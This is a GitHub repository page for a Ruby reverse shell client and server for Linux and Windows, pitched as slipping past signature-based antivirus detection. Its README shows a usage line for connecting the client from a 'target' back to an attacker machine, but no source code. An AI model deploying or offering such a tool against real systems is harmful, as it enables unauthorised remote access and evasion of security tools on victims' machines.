Skip to content

A reverse shell in ruby for linux and windows

Notifications You must be signed in to change notification settings

0xNoport/rubyrev

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
 
 
 
 
 
 

Repository files navigation

Ruby Reverse Shell

This reverse shell is useful when other reverse shells get flagged by AV by signature-based detection.

Requirements:

[!] Server that receives the reverse shell must have ruby installed, the victim doesn't

[!] You might need to recompile the exe, depending on your architecture.


These are scripts/exes that can be used as a better reverse shell. It's a basic reverse shell. Same would be possible using netcat. The advantage is that this program has a unique signature while netcat's exe is known.

Host the shell_server.rb on the attacker machine and then use the shell_client.exe / shell_client.rb to connect to it by calling it with these arguments on the target.

.\shell_client.exe *IP* *PORT*

About

A reverse shell in ruby for linux and windows

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published